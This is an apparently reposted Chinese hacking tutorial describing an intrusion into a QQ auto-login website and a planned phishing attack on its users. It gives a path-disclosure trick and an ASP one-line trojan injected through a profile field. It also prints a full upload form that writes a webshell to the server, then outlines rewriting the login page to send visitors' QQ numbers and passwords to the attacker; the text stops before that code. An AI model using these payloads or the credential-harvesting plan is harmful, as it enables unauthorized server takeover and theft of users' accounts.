推荐:入侵QQ挂机网实施钓鱼攻击

  文件类型：DOC/Microsoft Word  文件大小：字节

更多搜索：推荐  入侵  QQ  挂机  实施  钓鱼  攻击  
推荐:入侵QQ挂机网实施钓鱼攻击推荐:入侵QQ挂机网实施钓鱼攻击
入侵QQ挂机网实施钓鱼攻击(已发表在黑客X档案05.10)
前不久上QQ老是收到好友挂机的信息..这次看到我同学发来的信息..无意中打开..看排名不错..突然就有了想
入侵它的冲动
QQ挂机的页面没什么看头..看看主站.ASP的..试了几个连接尝试SQL注入..失败...然后就想着找二级连接用%5c
爆库..很遗憾..没找到..正打算放弃的时候.看到有注册..就自己注册了一个进去玩...注册成功后返回一地址.
如图1
有点希望了,
改成
http://www.xxx.com/system/admin%5csave_user.asp 〈为了引起不必要的麻烦.去除敏感信息〉
数据库路径给爆了出来...如图2
换成URL就是
http://www.xxx.com/system/xxxx/system.asp
数据库是出来了..还是ASP..未做防下载处理..但我们如何利用呢..开始我们已经注册了用户..登陆看看把..
看到有〈个人信息修改〉
我们在地址或个人主页那里写上一句话代码
〈%execute request("value")%〉 图3
自我介绍那里我试了.只要写了代码就被转义了,,
然后我们重新看下数据库文件
http://www.xxx.com/system/xxxx/system.asp
看最下面的数据..图4
Microsoft VBScript 运行时错误 错误 '800a000d'
类型不匹配: 'execute'
/system/xxxx/system.asp,行838
说明我们已经成功把一句话木马代码写进数据库
然后把以下代码保存HTM格式的就可以本地上传一个马了...
〈form action=http://www.xxx.com/system/xxxx/system.asp method=post〉
〈textarea name=value cols=120 rows=10 width=45〉
set lP=server.createObject("Adodb.Stream")
lP.Open
lP.Type=2
lP.CharSet="gb2312"
lP.writetext request("fhod")
lP.SaveToFile server.mappath("ck.asp"),2
lP.Close
set lP=nothing
response.redirect "ck.asp"
〈/textarea〉
木马
〈/textarea〉〈BR〉〈center〉〈br〉
〈input type=submit value=提交〉
我写了一个海洋的马..然后提交...返回登陆界面..
http://www.xxx.com/system/xxxx/ck.asp
图5...成功
这里关于怎么入侵的.写的不是很详细.很多都是一概而过..因为没多少技术含量..本文也并不是着重讲解如何
入侵的...下面的内容才是最主要的...就是我如何利用这个挂Q的站实现一次钓鱼攻击的
拿到SHELL后进入QQ目录..看到实现挂机的也就index.asp和def.asp两个文件...其中代码是调用了服务器安装
的组件..具体什么组件就不清楚了..
看下index.asp代码
〈form method="POST" action="Index.asp"〉
〈tr〉〈td colspan=2 align=center bgcolor="#F5F5F5"〉用户登陆〈/td〉〈/tr〉
〈tr〉〈td〉〈img src="Img/Login.jpg"〉〈/td〉
〈td〉QQ号码:〈input type=text size=20 name=QQ value="〈%=QQ%〉"〉〈br〉
密 码:〈input type=password size=20 name=Password value="〈%=PWD%〉"〉〈br〉
登陆过程就是这样实现...由于代码多....我就不全发了...
那我们是否可以修改这里的代码来实现钓鱼呢...也就是...别人来挂QQ输入了QQ和密码只要点了登陆..那么QQ
和密码就会发给我们预先设定好的一个地方
·上一篇：用photoshop给照片加框的方法
·下一篇：QQ上传教程